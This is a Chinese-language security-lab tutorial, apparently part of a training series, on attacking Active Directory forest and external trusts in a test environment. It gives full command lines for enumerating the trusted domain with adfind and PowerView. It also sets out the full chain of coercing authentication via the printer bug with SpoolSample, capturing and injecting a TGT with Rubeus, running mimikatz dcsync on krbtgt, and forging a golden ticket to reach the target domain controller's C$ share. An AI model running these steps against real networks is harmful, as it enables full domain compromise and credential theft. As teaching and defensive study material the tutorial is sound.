跨域攻击分析和防御(下)
2023-12-5 16:49:22 Author: Ms08067安全实验室(查看原文) 阅读量:8 收藏

点击星标,即时接收最新推文

外部信任和林信任的利用

域林信任环境搭建如下:

当前林域控:dc.a.com (Windows Server 2012 R2)

目标林域控:bdc.b.com (Windows Server 2012 R2)

当前域域控:adc1.a.com (Windows Server 2012 R2)

目标域域控:bdc1.b.com (Windows Server 2012 R2)

外部信任环境外部信任,如图7-16所示。

图 7-16 信任关系

1. 利用信任关系获取信任域的信息。

外部信任和林信任因为存在sid过滤所以无法利用SID History获取权限,但是至少我们可以查询到任何正常的活动目录信息,甚至可以实施跨信任边界的kerberosating攻击。

使用adfind工具可以获取信任域的完整信息,这里以获取Administrator用户的详细信息为例。输入下列命令,我们可以导出全部用户的信息,然后通过对比目标域和当前域的用户列表,查找同时加入了两个域的用户,尝试这些用户是否具有目标域的权限,如图7-17所示。

adfind下载地址:http://www.joeware.net/freetools/tools/adfind/。

adfind -h bdc1.b.com -sc u:Administrator

图 7-17获取信任域的完整信息

2.使用powerview定位敏感用户
利用Get-DomainForeignGroupMember命令可以列出加入目标域用户组的外部用户,输入下列命令,结果如图7-18所示。
Get-DomainForeignGroupMember -Domain B.com

图 7-18 列出加入目标域用户组的外部用户

利用无约束委派+MS-RPRN获取信任林权限

如果我们已经获取了森林中某个域控(或者配置了无约束委派的任何服务器)的权限,可以使用MS-RPRN的RpcRemoteFindFirstPrinterChangeNotification(Ex)方法来强迫信任林的域控向我们控制的服务器发起身份认证请求,然后利用捕捉到的票据获取信任林任意用户的哈希,进而获取目标林的权限。

首先在dc.a.com上使用工具rubeus监控身份认证请求,输入下列命令,interval参数用于设置监控的时间间隔秒数,filteruser用于指定我们关注的用户,如图7-19所示。
Rubeus下载地址:https://github.com/GhostPack/Rubeus。
Rubeus.exe monitor /interval:5 /filteruser:BDC$

图 7-19监控身份认证请求

开启监听后在另一个命令行提示符中使用工具SpoolSample执行如下命令,强制目标域控bcd.b.com向当前已经控制的域控dc.a.com发起身份认证请求,如图7-20所示。
SpoolSample下载地址:https://github.com/leechristensen/SpoolSample。
SpoolSample bdc.b.com dc.a.com

图 7-20发起身份认证请求

此时工具Rubeus会捕捉到来自bdc.b.com的认证请求,保存其中的TGT数据,如图7-21所示。

图 7-21捕捉认证请求并保存

去除TGT数据中的多余换行,使用工具Rubeus将票据注入到内存中,输入如下命令,如图7-22所示。
Rubeus.exe ptt /ticket:XXXX

图 7-22票据注入到内存

使用mimikatz获取目标域的kebtgt哈希。mimikatz中的dcsync功能可以假冒域控向目标域控请求账户密码数据,输入下列命令,如图7-23所示。
Mimikatz.exe “lsadump::dcsync /domain:B.com /user:B\krbtgt” exit

图 7-23获取目标域的kebtgt哈希

输入如下命令,构造黄金票据并注入到内存中,即可获取目标域控的权限,如图7-24所示。
Mimikatz.exe “Kerberos::golden /user:Administrator /domain:B.com /sid:S-1-5-21-1163464416-126101326-234308999 /rc4:0d96891dc4749658f448e1ed26aa2f4d /ptt” exit
最后输入下列命令,成功访问目标服务,如图7-24所示。
dir \\bdc.b.com\C$

图 7-24构造黄金票据注入内存并获取目标权限

MS08067安全实验室视频号已上线
欢迎各位同学关注转发~

—  实验室旗下直播培训课程  —

和20000+位同学加入MS08067一起学习


文章来源: http://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247516555&idx=2&sn=891d9b9cbf1fc981cc683e62c8c38fa8&chksm=fc3c388acb4bb19cd8d900631127a95a26627530f8b9b88892ed40be57eb2ec5c6b9cdacd451&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh